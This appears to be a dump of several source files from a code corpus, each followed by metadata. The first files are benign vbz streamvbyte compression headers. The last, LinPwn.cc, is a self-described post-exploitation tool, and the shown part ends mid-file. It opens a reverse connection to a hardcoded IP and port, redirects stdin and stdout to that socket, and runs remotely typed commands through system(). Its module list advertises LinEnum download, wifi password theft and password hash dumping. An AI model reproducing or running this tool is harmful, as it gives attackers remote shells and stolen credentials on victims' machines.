353, 380, 349, 346, 342, 344, 345, 339, 349, 348, 350, 349, 362, 349, 350, 352, 346, 344, 333, 349, 335, 358, 343, 342, 335, 336, 303, 321, 306, 308, 298, 308, 322, 318, 307, 306, 307, 440, 453, 458, 440, 443, 427, 421, 437, 416, 435, 433, 423, 428, 434, 435, 444, 436, 373, 348, 354, 346, 366, 357, 369, 375, 372, 360, 367, 351, 354, 361, 355, 365, 351, 355, 353, 361, 373, 353, 345, 346, 337, 328, 322, 330, 283, 257, 279, 273, 271, 294, 276, 275, 270, 274, 272, 265, 274, 272, 258, 289, 246, 246, 274, 262, 257, 206, 194, 214, 206, 205, 204, 202, 193, 213, 204, 212, 247, 264, 267, 251, 247, 271, 257, 262, 261, 263, 254, 253, 362, 338, 370, 345, 364, 352, 363, 353, 330, 297, 269, 255, 257, 240, 246, 214, 244, 256, 254, 240, 229, 235, 240, 246, 363, 386, 376, 396, 372, 372, 376, 356, 388, 368, 386, 365, 387, 361, 277, 283, 295, 266, 270, 271, 274, 267, 257, 249, 254, 325, 312, 329, 311, 312, 330, 330, 332, 322, 333, 322, 306, 301, 319, 320, 303, 291, 301, 299, 285, 276, 291, 272, 276, 317, 323, 322, 327, 328, 337, 335, 319, 336, 316, 284, 269, 336, 314, 341, 335, 281, 244, 215, 261, 237, 218, 225, 311, 358, 232, 235, 219, 320, 369, 429, 410, 441, 412, 383, 345, 364, 373, 355, 362, 353, 354, 360, 342, 361, 344, 363, 358, 352, 351, 357, 341, 325, 325, 320, 348, 336, 358, 366, 375, 412, 416, 389, 388, 393, 397, 411, 387, 372, 390, 379, 313, 348, 360, 290, 269, 270, 267, 269, 264, 275, 271, 276, 271, 263, 274, 232, 246, 249, 210, 237, 234, 239, 264, 292, 332, 365, 334, 326, 330, 307, 306, 282, 285, 273, 324, 350, 362, 347, 343, 312, 333, 334, 401, 360, 332, 334, 388, 374, 381, 313, 266, 259, 259, 269, 263, 268, 282, 261, 259, 272, 273, 265, 256, 258, 264, 271, 259, 278, 340, 428, 439, 400, 414, 389, 383, 389, 340, 283, 258, 270, 268, 252, 277, 264, 265, 238, 252, 259, 259, 248, 251, 250, 255, 247, 269, 242, 274, 254, 235, 245, 248, 257, 347, 327, 329, 325, 339, 341, 330, 284, 326, 340, 342, 331, 353, 363, 383, 373, 396, 393, 391, 372, 359, 344, 364, 394, 344, 332, 336, 326, 345, 328, 340, 348, 323, 320, 269, 263, 265, 251, 266, 303, 342, 353, 357, 326, 330, 344, 356, 342, 341, 348, 332, 355, 383, 393, 419, 356, 350, 342, 351, 357, 345, 334, 343, 354, 334, 317, 315, 312, 314, 302, 317, 318, 310, 304, 311, 329, 304, 314, 318, 368, 389, 388, 401, 378, 398, 384, 408, 387, 392, 398, 400, 413, 377, 390, 392, 388, 380, 371, 368, 380, 357, 306, 296, 310, 286, 300, 296, 293, 309, 299, 321, 306, 310, 316, 315, 324, 318, 348, 327, 333, 309, 326, 304, 309, 297, 291, 308, 298, 321, 322, 312, 309, 293, 299, 334, 340, 344, 366, 355, 351, 358, 344, 374, 352, 350, 350, 369, 352, 301, 270, 271, 277, 263, 260, 282, 257, 273, 258, 270, 263, 309, 344, 340, 334, 320, 315, 346, 348, 334, 344, 365, 331, 370, 366, 377, 385, 372, 355, 383, 378, 378, 393, 383, 389, 379, 385, 387, 379, 376, 382, 306, 322, 312, 338, 312, 323, 320, 321, 326, 293, 299, 312, 317, 297, 275, 289, 288, 288, 284, 284, 296, 274, 282, 287, 289, 285, 292, 277, 274, 282, 250, 222, 223, 231, 243, 249, 249, 249, 243, 240, 236, 215, 207, 220, 197, 196, 191, 254, 248, 242, 251, 246, 252, 262, 262, 249, 253, 262, 244, 219, 251, 257, 283, 261, 259, 267, 265, 264, 281, 278, 276, 267, 265, 275, 268, 282, 276, 266, 352, 384, 389, 371, 386, 382, 355, 357, 371, 364, 380, 372, 372, 389, 379, 371, 363, 366, 381, 365, 380, 382, 372, 380, 323, 331, 305, 315, 314, 296, 310, 306, 302, 310, 308, 309, 249, 221, 216, 213, 295, 329, 339, 342, 367, 335, 355, 361, 354, 354, 366, 361, 364, 354, 342, 300, 293, 285, 274, 290, 282, 255, 265, 285, 284, 285, 278, 291, 293, 275, 281, 301, 301, 328, 407, 427, 409, 415, 423, 389, 355, 322, 394, 344, 333, 386, 365, 360, 362, 335, 344, 400, 396, 346, 351, 306, 328, 328, 307, 313, 307, 312, 312, 313, 314, 311, 282, 242, 237, 242, 249, 234, 389, 398, 370, 344, 350, 345, 350, 384, 338, 321, 356, 363, 346, 343, 364, 349, 366, 278, 233, 209, 217, 221, 318, 368, 371, 367, 363, 358, 352, 359, 339, 305, 311, 308, 313, 303, 310, 279, 290, 303, 302, 295, 304, 283, 308, 279, 302, 324, 255, 236, 225, 240, 294, 286, 272, 209, 232, 231, 218, 235, 233, 219, 217, 217, 230, 224, 228, 213, 216, 220, 140, 141, 161, 175, 144, 151, 159, 165, 152, 146, 205, 198, 215, 217, 220, 229, 203, 226, 213, 207, 326, 395, 396, 391, 407, 388, 382, 388, 406, 367, 372, 369, 371, 268, 268, 256, 211, 204, 180, 196, 198, 212, 198, 182, 205, 283, 266, 248, 259, 355, 295, 383, 389, 391, 406, 381, 397, 389, 390, 355, 254, 252, 268, 229, 227, 208, 219, 211, 216, 230, 236, 351, 145, 201, 280, 340, 354, 367, 378, 406, 403, 376, 391, 384, 370, 387, 351, 342, 339, 322, 329, 324, 328, 311, 311, 321, 297, 320, 310, 299, 311, 311, 300, 303, 333, 285, 283, 286, 280, 279, 268, 274, 270, 242, 240, 245, 257, 237, 245, 255, 258, 272, 264, 277, 268, 257, 263, 266, 296, 266, 260, 259, 275, 259, 269, 279, 277, 257, 251, 272, 282, 276, 269, 266, 273, 274, 274, 266, 282, 273, 272, 265, 342, 380, 377, 385, 396, 371, 367, 375, 400, 380, 392, 396, 380, 370, 350, 362, 380, 365, 354, 329, 339, 359, 324, 309, 302, 330, 329, 357, 349, 344, 349, 353, 357, 339, 335, 339, 340, 344, 316, 326, 320, 368, 372, 384, 378, 363, 296, 287, 291, 265, 256, 273, 292, 237, 230, 222, 215, 234, 240, 229, 249, 217, 233, 229, 237, 226, 258, 264, 257, 271, 259, 265, 237, 252, 248, 254, 249, 256, 244, 249, 254, 243, 260, 254, 272, 269, 253, 269, 261, 274, 261, 261, 268, 249, 265, 249, 254, 257, 255, 246, 234, 245, 226, 257, 261, 243, 249, 247, 232, 244, 250, 262, 249, 243, 237, 264, 263, 231, 248, 233, 240, 226, 234, 244, 230, 220, 245, 236, 256, 234, 242, 232, 238, 244, 236, 237, 220, 244, 245, 242, 223, 226, 241, 247, 237, 238, 236, 232, 230, 241, 234, 240, 239, 234, 254, 185, 200, 181, 187, 198, 178, 196, 184, 186, 173, 197, 211, 196, 190, 183, 191, 193, 193, 185, 190, 190, 346, 374, 375, 367, 361, 376, 378, 367, 358, 362, 328, 325, 316, 309, 320, 341, 329, 329, 317, 316, 323, 334, 304, 306, 310, 319, 306, 317, 304, 308, 313, 319, 308, 305, 301, 303, 309, 318, 297, 284, 328, 324, 313, 327, 330, 323, 275, 258, 251, 241, 252, 332, 335, 350, 323, 343, 354, 349, 361, 352, 360, 366, 361, 360, 382, 367, 344, 368, 373, 357, 341, 354, 361, 347, 356, 370, 359, 370, 372, 350, 357, 347, 378, 364, 357, 356, 352, 381, 364, 274, 295, 288, 291, 279, 291, 274, 262, 276, 301, 300, 273, 287, 264, 286, 288, 266, 273, 275, 279, 295, 306, 290, 271, 369, 351, 365, 370, 302, 284, 291, 272, 294, 274, 290, 281, 278, 272, 252, 229, 148, 163, 159, 163, 171, 180, 160, 172, 167, 163, 151, 158, 171, 151, 169, 157, 202, 203, 201, 96, 294, 204, 284, 467, 447, 433, 397, 340, 363, 357, 430, 378, 380, 377, 367, 354, 378, 382, 369, 288, 289, 267, 261, 304, 259, 252, 245, 260, 268, 244, 253, 166, 187, 179, 180, 183, 206, 223, 265, 264, 281, 312, 302, 296, 339, 320, 347, 345, 350, 379, 373, 400, 374, 383, 370, 396, 402, 368, 390, 389, 372, 377, 397, 394, 383, 388, 399, 358, 361, 336, 324, 342, 324, 342, 325, 297, 270, 276, 277, 268, 253, 253, 236, 262, 235, 227, 224, 232, 234, 225, 235, 237, 221, 233, 235, 234, 243, 211, 209, 198, 202, 184, 201, 188, 210, 245, 257, 241, 253, 241, 241, 250, 250, 306, 386, 365, 373, 403, 381, 388, 387, 395, 377, 377, 377, 368, 364, 362, 362, 353, 360, 357, 349, 364, 358, 357, 354, 361, 360, 377, 363, 380, 391, 405, 393, 371, 366, 346, 366, 342, 349, 360, 341, 343, 350, 303, 275, 264, 269, 269, 265, 279, 269, 267, 271, 268, 258, 274, 266, 295, 316, 252, 275, 265, 284, 275, 280, 278, 287, 247, 262, 254, 236, 255, 235, 251, 256, 237, 240, 246, 252, 239, 249, 245, 249, 254, 246, 249, 247, 238, 239, 244, 235, 246, 245, 259, 244, 270, 234, 247, 244, 250, 249, 252, 257, 242, 262, 285, 262, 276, 350, 347, 356, 365, 350, 370, 348, 371, 350, 353, 351, 354, 358, 348, 350, 346, 359, 350, 351, 341, 358, 380, 364, 352, 339, 355, 333, 333, 265, 208, 210, 228, 212, 207, 220, 228, 232, 212, 243, 234, 251, 242, 238, 247, 248, 243, 216, 414, 399, 407, 394, 388, 404, 401, 386, 404, 396, 390, 310, 302, 252, 213, 200, 206, 201, 218, 196, 200, 225, 195, 202, 187, 199, 348, 361, 343, 346, 367, 342, 328, 303, 271, 288, 285, 295, 287, 288, 279, 274, 268, 310, 259, 268, 237, 227, 221, 225, 242, 229, 232, 243, 250, 239, 261, 289, 285, 274, 293, 283, 269, 284, 286, 286, 282, 287, 281, 275, 278, 285, 284, 277, 285, 295, 291, 348, 373, 383, 371, 387, 367, 372, 370, 374, 360, 378, 381, 312, 271, 265, 263, 257, 260, 264, 261, 251, 247, 238, 255, 259, 256, 256, 289, 374, 375, 383, 371, 378, 326, 323, 319, 312, 319, 312, 327, 338, 340, 342, 342, 333, 337, 325, 311, 320, 274, 262, 265, 273, 282, 271, 271, 270, 268, 278, 275, 267, 276, 268, 265, 263, 346, 371, 373, 372, 348, 358, 391, 280, 260, 259, 253, 268, 271, 265, 270, 290, 259, 259, 264, 270, 270, 243, 279, 259, 287, 260, 277, 285, 257, 270, 264, 258, 258, 263, 264, 248, 282, 275, 281, 280, 287, 262, 256, 267, 271, 269, 248, 275, 284, 277, 266, 266, 256, 264, 254, 282, 287, 262, 267, 265, 276, 290, 290, 270, 286, 266, 273, 257, 273, 271, 269, 276, 272, 249, 254, 260, 290, 266, 256, 276, 269, 268, 261, 278, 270, 264, 282, 258, 271, 273, 272, 264, 263, 282, 288, 267, 259, 262, 275, 306, 258, 260, 277, 283, 288, 273, 280, 290, 285, 279, 286, 281, 275, 285, 276, 288, 286, 292, 286, 281, 275, 275, 283, 285, 278, 280, 275, 278, 280, 281, 279, 281, 285, 274, 273, 272, 276, 292, 269, 293, 280, 278, 288, 270, 276, 277, 272, 283, 284, 287, 281, 272, 273, 280, 274, 271, 273, 272, 263, 279, 278, 284, 294, 281, 270, 290, 285, 271, 287, 271, 284, 272, 284, 274, 273, 281, 295, 282, 285, 275, 282, 279, 275, 280, 288, 275, 296, 279, 271, 266, 279, 268, 274, 273, 276, 290, 288, 277, 280, 276, 281, 284, 282, 296, 274, 284, 283, 280, 276, 270, 266, 245, 239, 242, 251, 260, 276, 262, 273, 282, 273, 285, 267, 260, 266, 279, 265, 275, 273, 281, 274, 269, 271, 256, 265, 268, 286 };
78,294
C++
.h
5
15,656.8
78,215
0.600092
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,173
vbz_streamvbyte.h
nanoporetech_vbz_compression/vbz/v0/vbz_streamvbyte.h
#pragma once #include "vbz/vbz_export.h" #include "vbz.h" #include <cstddef> // Version 1 of streamvbyte // // This method follows streamvbyte exactly. /// \brief find the maximum size a compressed data stream /// using streamvbyte compression could be. /// \param integer_size The input integer size in bytes. /// \param source_size The size of the input buffer, in bytes. VBZ_EXPORT vbz_size_t vbz_max_streamvbyte_compressed_size_v0( size_t integer_size, vbz_size_t source_size); /// \brief Encode the source data using a combination of delta zig zag + streamvbyte encoding. /// \param source Source data for compression. /// \param source_size Source data size (in bytes) /// \param destination Destination buffer for compressed output. /// \param destination_capacity Size of the destination buffer to write to (see #max_streamvbyte_compressed_size) /// \param integer_size Number of bytes per integer /// \param use_delta_zig_zag_encoding Control if the data should be delta-zig-zag encoded before streamvbyte encoding. /// \return The number of bytes used to compress data into [destination]. VBZ_EXPORT vbz_size_t vbz_delta_zig_zag_streamvbyte_compress_v0( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, int integer_size, bool use_delta_zig_zag_encoding); /// \brief Decode the source data using a combination of delta zig zag + streamvbyte encoding. /// \param source Source compressed data for decompression. /// \param source_size Source data size (in bytes) /// \param destination Destination buffer for decompressed output. /// \param destination_size Size of the destination buffer to write to in bytes. /// This must be a multiple of integer_size, and equal to the number of /// expected output bytes exactly. The caller is expected to store this information alongside /// the compressed data. /// \param integer_size Number of bytes per integer (must equal size used to compress) /// \param use_delta_zig_zag_encoding Control if the data should be delta-zig-zag encoded before streamvbyte encoding. /// (must equal value used to compress). /// \return The number of bytes used to decompress data into [destination]. VBZ_EXPORT vbz_size_t vbz_delta_zig_zag_streamvbyte_decompress_v0( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_size, int integer_size, bool use_delta_zig_zag_encoding);
2,773
C++
.h
48
55.5
129
0.672426
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,174
vbz_streamvbyte_impl.h
nanoporetech_vbz_compression/vbz/v0/vbz_streamvbyte_impl.h
#pragma once #include "vbz.h" #include "streamvbyte.h" #include "streamvbyte_zigzag.h" #include <gsl/gsl-lite.hpp> #include <vector> /// \brief Generic implementation, safe for all integer types, and platforms. template <typename T, bool UseZigZag> struct StreamVByteWorkerV0 { static vbz_size_t compress(gsl::span<char const> input_bytes, gsl::span<char> output) { auto const input = input_bytes.as_span<T const>(); if (!UseZigZag) { auto input_buffer = cast<std::uint32_t>(input); return vbz_size_t(streamvbyte_encode( input_buffer.data(), std::uint32_t(input_buffer.size()), output.as_span<std::uint8_t>().data() )); } std::vector<std::int32_t> input_buffer = cast<std::int32_t>(input); std::vector<std::uint32_t> intermediate_buffer(input.size()); zigzag_delta_encode(input_buffer.data(), intermediate_buffer.data(), input_buffer.size(), 0); return vbz_size_t(streamvbyte_encode( intermediate_buffer.data(), std::uint32_t(intermediate_buffer.size()), output.as_span<std::uint8_t>().data() )); } static vbz_size_t decompress(gsl::span<char const> input, gsl::span<char> output_bytes) { auto const output = output_bytes.as_span<T>(); std::vector<std::uint32_t> intermediate_buffer(output.size()); auto read_bytes = streamvbyte_decode( input.as_span<std::uint8_t const>().data(), intermediate_buffer.data(), vbz_size_t(intermediate_buffer.size()) ); if (read_bytes != input.size()) { return VBZ_STREAMVBYTE_STREAM_ERROR; } if (!UseZigZag) { cast(gsl::make_span(intermediate_buffer), output); return vbz_size_t(output.size() * sizeof(T)); } std::vector<std::int32_t> output_buffer(output.size()); zigzag_delta_decode(intermediate_buffer.data(), output_buffer.data(), output_buffer.size(), 0); cast(gsl::make_span(output_buffer), output); return vbz_size_t(output.size() * sizeof(T)); } template <typename U, typename V> static std::vector<U> cast(gsl::span<V> const& input) { std::vector<U> output(input.size()); for (std::size_t i = 0; i < input.size(); ++i) { output[i] = input[i]; } return output; } template <typename U, typename V> static void cast(gsl::span<U> input, gsl::span<V> output) { for (std::size_t i = 0; i < input.size(); ++i) { output[i] = input[i]; } } }; #ifdef __SSE3__ #include "vbz_streamvbyte_impl_sse3.h" #endif
2,835
C++
.h
76
28.434211
103
0.589332
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,175
vbz_streamvbyte.h
nanoporetech_vbz_compression/vbz/v1/vbz_streamvbyte.h
#pragma once #include "vbz/vbz_export.h" #include "vbz.h" #include <cstddef> // Version 1 of streamvbyte // // This method introduces half byte + zero byte compression. /// \brief find the maximum size a compressed data stream /// using streamvbyte compression could be. /// \param integer_size The input integer size in bytes. /// \param source_size The size of the input buffer, in bytes. VBZ_EXPORT vbz_size_t vbz_max_streamvbyte_compressed_size_v1( size_t integer_size, vbz_size_t source_size); /// \brief Encode the source data using a combination of delta zig zag + streamvbyte encoding. /// \param source Source data for compression. /// \param source_size Source data size (in bytes) /// \param destination Destination buffer for compressed output. /// \param destination_capacity Size of the destination buffer to write to (see #max_streamvbyte_compressed_size) /// \param integer_size Number of bytes per integer /// \param use_delta_zig_zag_encoding Control if the data should be delta-zig-zag encoded before streamvbyte encoding. /// \return The number of bytes used to compress data into [destination]. VBZ_EXPORT vbz_size_t vbz_delta_zig_zag_streamvbyte_compress_v1( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_capacity, int integer_size, bool use_delta_zig_zag_encoding); /// \brief Decode the source data using a combination of delta zig zag + streamvbyte encoding. /// \param source Source compressed data for decompression. /// \param source_size Source data size (in bytes) /// \param destination Destination buffer for decompressed output. /// \param destination_size Size of the destination buffer to write to in bytes. /// This must be a multiple of integer_size, and equal to the number of /// expected output bytes exactly. The caller is expected to store this information alongside /// the compressed data. /// \param integer_size Number of bytes per integer (must equal size used to compress) /// \param use_delta_zig_zag_encoding Control if the data should be delta-zig-zag encoded before streamvbyte encoding. /// (must equal value used to compress). /// \return The number of bytes used to decompress data into [destination]. VBZ_EXPORT vbz_size_t vbz_delta_zig_zag_streamvbyte_decompress_v1( void const* source, vbz_size_t source_size, void* destination, vbz_size_t destination_size, int integer_size, bool use_delta_zig_zag_encoding);
2,790
C++
.h
48
55.854167
129
0.672634
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,176
vbz_streamvbyte_impl.h
nanoporetech_vbz_compression/vbz/v1/vbz_streamvbyte_impl.h
#pragma once #include "vbz.h" #include "streamvbyte.h" #include "streamvbyte_zigzag.h" #include <gsl/gsl-lite.hpp> #include <cassert> #include <vector> #ifdef _MSC_VER # define VBZ_RESTRICT __restrict #else # define VBZ_RESTRICT __restrict__ #endif static inline uint32_t _decode_data(const uint8_t **dataPtrPtr, uint8_t code, uint8_t *data_shift) { uint32_t val; auto read_data = [&](uint8_t bits) { uint32_t return_val = 0; auto& current_shift = *data_shift; for (std::size_t i = 0; i < bits / 4; ++i) { if (current_shift == 8) { current_shift = 0; *dataPtrPtr += 1; } const uint8_t *dataPtr = *dataPtrPtr; auto val_bits = 0xf & (*dataPtr >> current_shift); return_val |= val_bits << (i*4); current_shift += 4; } return return_val; }; if (code == 0) { // 0 bytes val = 0; } else if (code == 1) { // 1/2 byte val = read_data(4); } else if (code == 2) { // 1 byte val = read_data(8); } else if (code == 3) { // 2 bytes val = read_data(16); } else { assert(0 && "Unknown code"); val = 0; } return val; } static const uint8_t *svb_decode_scalar(uint32_t *outPtr, const uint8_t *keyPtr, const uint8_t *dataPtr, uint32_t count) { if (count == 0) return dataPtr; // no reads or writes if no data uint8_t data_shift = 0; uint8_t shift = 0; uint32_t key = *keyPtr++; for (uint32_t c = 0; c < count; c++) { if (shift == 8) { shift = 0; key = *keyPtr++; } uint32_t val = _decode_data(&dataPtr, (key >> shift) & 0x3, &data_shift); *outPtr++ = val; shift += 2; } if (data_shift != 0) { dataPtr += 1; } return dataPtr; // pointer to first unused byte after end } static uint8_t _encode_data(uint32_t val, uint8_t *VBZ_RESTRICT *dataPtrPtr, uint8_t* data_shift) { uint8_t code; auto write_data = [&](uint32_t value, uint8_t bits) { auto& current_shift = *data_shift; for (std::size_t i = 0; i < bits / 4; ++i) { if (current_shift == 8) { current_shift = 0; *dataPtrPtr += 1; } auto val_masked = value & 0xf; value >>= 4; uint8_t *dataPtr = *dataPtrPtr; if (current_shift == 0) { *dataPtr = 0; } *dataPtr |= val_masked << current_shift; current_shift += 4; } }; if (val == 0) { // 0 bytes code = 0; } else if (val < (1 << 4)) { // 1/2 byte write_data(val, 4); code = 1; } else if (val < (1 << 8)) { // 1 byte write_data(val, 8); code = 2; } else { // 2 bytes write_data(val, 16); code = 3; } return code; } static uint8_t *svb_encode_scalar(const uint32_t *in, uint8_t *VBZ_RESTRICT keyPtr, uint8_t *VBZ_RESTRICT dataPtr, uint32_t count) { if (count == 0) return dataPtr; // exit immediately if no data uint8_t data_shift = 0; uint8_t shift = 0; // cycles 0, 2, 4, 6, 0, 2, 4, 6, ... uint8_t key = 0; for (uint32_t c = 0; c < count; c++) { if (shift == 8) { shift = 0; *keyPtr++ = key; key = 0; } uint32_t val = in[c]; uint8_t code = _encode_data(val, &dataPtr, &data_shift); key |= code << shift; shift += 2; } if (data_shift != 0) { dataPtr += 1; } *keyPtr = key; // write last key (no increment needed) return dataPtr; // pointer to first unused data byte } vbz_size_t streamvbyte_encode_half(uint32_t const* input, uint32_t count, uint8_t* output) { uint8_t *keyPtr = output; uint32_t keyLen = (count + 3) / 4; // 2-bits rounded to full byte uint8_t *dataPtr = keyPtr + keyLen; // variable byte data after all keys return vbz_size_t(svb_encode_scalar(input, keyPtr, dataPtr, count) - output); } vbz_size_t streamvbyte_decode_half(uint8_t const* input, uint32_t* output, uint32_t count) { uint8_t *keyPtr = (uint8_t*)input; uint32_t keyLen = (count + 3) / 4; // 2-bits rounded to full byte uint8_t *dataPtr = keyPtr + keyLen; // variable byte data after all keys return vbz_size_t(svb_decode_scalar( output, keyPtr, dataPtr, count ) - input); } /// \brief Generic implementation, safe for all integer types, and platforms. template <typename T, bool UseZigZag> struct StreamVByteWorkerV1 { static vbz_size_t compress(gsl::span<char const> input_bytes, gsl::span<char> output) { auto const input = input_bytes.as_span<T const>(); if (!UseZigZag) { auto input_buffer = cast<std::uint32_t>(input); return vbz_size_t(streamvbyte_encode_half( input_buffer.data(), std::uint32_t(input_buffer.size()), output.as_span<std::uint8_t>().data() )); } std::vector<std::int32_t> input_buffer = cast<std::int32_t>(input); std::vector<std::uint32_t> intermediate_buffer(input.size()); zigzag_delta_encode(input_buffer.data(), intermediate_buffer.data(), input_buffer.size(), 0); return vbz_size_t(streamvbyte_encode_half( intermediate_buffer.data(), std::uint32_t(intermediate_buffer.size()), output.as_span<std::uint8_t>().data() )); } static vbz_size_t decompress(gsl::span<char const> input, gsl::span<char> output_bytes) { auto const output = output_bytes.as_span<T>(); std::vector<std::uint32_t> intermediate_buffer(output.size()); auto read_bytes = streamvbyte_decode_half( input.as_span<std::uint8_t const>().data(), intermediate_buffer.data(), vbz_size_t(intermediate_buffer.size()) ); if (read_bytes != input.size()) { return VBZ_STREAMVBYTE_STREAM_ERROR; } if (!UseZigZag) { cast(gsl::make_span(intermediate_buffer), output); return vbz_size_t(output.size() * sizeof(T)); } std::vector<std::int32_t> output_buffer(output.size()); zigzag_delta_decode(intermediate_buffer.data(), output_buffer.data(), output_buffer.size(), 0); cast(gsl::make_span(output_buffer), output); return vbz_size_t(output.size() * sizeof(T)); } template <typename U, typename V> static std::vector<U> cast(gsl::span<V> const& input) { std::vector<U> output(input.size()); for (std::size_t i = 0; i < input.size(); ++i) { output[i] = input[i]; } return output; } template <typename U, typename V> static void cast(gsl::span<U> input, gsl::span<V> output) { for (std::size_t i = 0; i < input.size(); ++i) { output[i] = input[i]; } } };
7,448
C++
.h
218
25.119266
103
0.533644
nanoporetech/vbz_compression
38
10
18
MPL-2.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,177
LinPwn.cc
Andromeda1957_LinPwn/LinPwn.cc
/* LinPwn Interactive Post Exploitation Tool Copyright (C) 2019 Andromeda3(3XPL017) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <https://www.gnu.org/licenses/>. */ #include <unistd.h> #include <arpa/inet.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/utsname.h> #include <cstdio> #include <cstdlib> #include <cstring> #include <csignal> #include <ctime> #include <chrono>//NOLINT #include <string> #define BUFFER 200 int sd() { return 0; } void get_input(char *option) { fgets(option, BUFFER, stdin); for (unsigned int i = 0; i <= strnlen(option, BUFFER); i++) { if (option[i] == '\n') { option[i] = '\0'; } } } void new_line() { std::string newline = "\n"; write(sd(), newline.data(), newline.length()); } void seperate() { std::string seperator = "=====================================" "======================================\n"; write(sd(), seperator.data(), seperator.length()); } void space() { std::string space = " "; write(sd(), space.data(), space.length()); } void green() { std::string green = "\x1b[32m "; write(sd(), green.data(), green.length()); } void none() { std::string none = "none\n"; write(sd(), none.data(), none.length()); } void help_menu() { std::string options = "\x1b[32mOptions \n"; std::string banner = "banner - displays the banner.\n"; std::string modules = "modules - lists modules.\n"; std::string clear = "clear - clears the screen.\n"; std::string exits = "exit - or press ^C to quit LinPwn.\n"; new_line(); write(sd(), options.data(), options.length()); seperate(); write(sd(), banner.data(), banner.length()); write(sd(), modules.data(), modules.length()); write(sd(), clear.data(), clear.length()); write(sd(), exits.data(), exits.length()); new_line(); } class Banner { public: void print_banner() { get_banner(); get_time(); get_sysinfo(); get_ip(); get_user(); get_uid(); get_pwd(); get_home(); get_shell(); get_term(); get_path(); new_line(); } private: void get_banner() { std::string title = "\x1b[32mLinPwn\nCreated By Andromeda.\n"; write(sd(), title.data(), title.length()); new_line(); } void get_time() { std::string print_time = "Time: "; write(sd(), print_time.data(), print_time.length()); auto end = std::chrono::system_clock::now(); std::time_t end_time = std::chrono::system_clock::to_time_t(end); std::string current_time = std::ctime(&end_time); write(sd(), current_time.data(), current_time.length()); } void get_sysinfo() { struct utsname utsinfo; uname(&utsinfo); std::string sysname = utsinfo.sysname; std::string nodename = utsinfo.nodename; std::string release = utsinfo.release; std::string version = utsinfo.version; std::string machine = utsinfo.machine; std::string domainname = utsinfo.domainname; std::string systems = "System: "; write(sd(), systems.data(), systems.length()); write(sd(), sysname.data(), sysname.length()); space(); write(sd(), nodename.data(), nodename.length()); space(); write(sd(), release.data(), release.length()); space(); write(sd(), version.data(), version.length()); space(); write(sd(), machine.data(), machine.length()); space(); write(sd(), domainname.data(), domainname.length()); new_line(); } void get_ip() { std::string ip = "IP: "; write(sd(), ip.data(), ip.length()); system("hostname -I"); } void get_user() { std::string env = "User: "; std::string username = getenv("USER"); write(sd(), env.data(), env.length()); if (!getenv("USER")) { none(); return; } write(sd(), username.data(), username.length()); new_line(); } void get_uid() { int uid = getuid(); std::string env = "UID: "; std::string uidstr = std::to_string(uid); write(sd(), env.data(), env.length()); write(sd(), uidstr.data(), uidstr.length()); new_line(); } void get_pwd() { std::string env = "Pwd: "; std::string pwd = getenv("PWD"); write(sd(), env.data(), env.length()); if (!getenv("PWD")) { none(); return; } write(sd(), pwd.data(), pwd.length()); new_line(); } void get_home() { std::string env = "Home: "; std::string home = getenv("HOME"); write(sd(), env.data(), env.length()); if (!getenv("HOME")) { none(); return; } write(sd(), home.data(), home.length()); new_line(); } void get_shell() { std::string env = "Shell: "; std::string shell = getenv("SHELL"); write(sd(), env.data(), env.length()); if (!getenv("SHELL")) { none(); return; } write(sd(), shell.data(), shell.length()); new_line(); } void get_term() { std::string env = "Term: "; std::string term = getenv("TERM"); write(sd(), env.data(), env.length()); if (!getenv("TERM")) { none(); return; } write(sd(), term.data(), term.length()); new_line(); } void get_path() { std::string env = "Path: "; std::string path = getenv("PATH"); write(sd(), env.data(), env.length()); if (!getenv("PATH")) { none(); return; } write(sd(), path.data(), path.length()); new_line(); } }; class Connection { public: void connection_open() { const int connecting = socket(AF_INET, SOCK_STREAM, 0);; address.sin_family = AF_INET; address.sin_addr.s_addr = inet_addr(ip); address.sin_port = htons(port); connect(connecting, (struct sockaddr *)&address, sizeof(address)); dup2(connecting, sd()); dup2(connecting, 1); } private: const char *ip = "192.168.1.165"; // Change this const int port = 8000; // Change this struct sockaddr_in address; }; class Modules { public: void list_modules() { std::string modules = "\x1b[32mModules \n"; std::string shell = "shell Executes /bin/sh\n"; std::string read_file = "readfile Print the contents of a file\n"; std::string enumerate = "enumerate Download and run LinEnum" " (requires internet access)\n"; std::string download = "download Downloads a file\n"; std::string wificredz = "wificredz Gets" " saved wifi passwords (root needed)\n"; std::string hashdump = "hashdump Gets" " system password hashes (root needed)\n"; new_line(); write(sd(), modules.data(), modules.length()); seperate(); write(sd(), shell.data(), shell.length()); write(sd(), read_file.data(), read_file.length()); write(sd(), enumerate.data(), enumerate.length()); write(sd(), download.data(), download.length()); write(sd(), wificredz.data(), wificredz.length()); write(sd(), hashdump.data(), hashdump.length()); new_line(); } void shell() { std::string shell = "\x1b[31m(LinPwn: Shell) >"; std::string exe = "\x1b[32mExecuting /bin/sh\n"; std::string exits = "Type exit to return to LinPwn.\n"; char option[BUFFER]; const char *errors = " 2>&0"; write(sd(), exe.data(), exe.length()); write(sd(), exits.data(), exits.length()); for (;;) { write(sd(), shell.data(), shell.length()); green(); get_input(option); if (strncmp(option, "exit\0", 5) == 0) { break; } else { strncat(option, errors, BUFFER); system(option); } } } void read_file() { std::string contents = "\x1b[32mType full path of file" "to view contents...\n"; std::string read = "\x1b[31m(LinPwn: Readfile) >"; 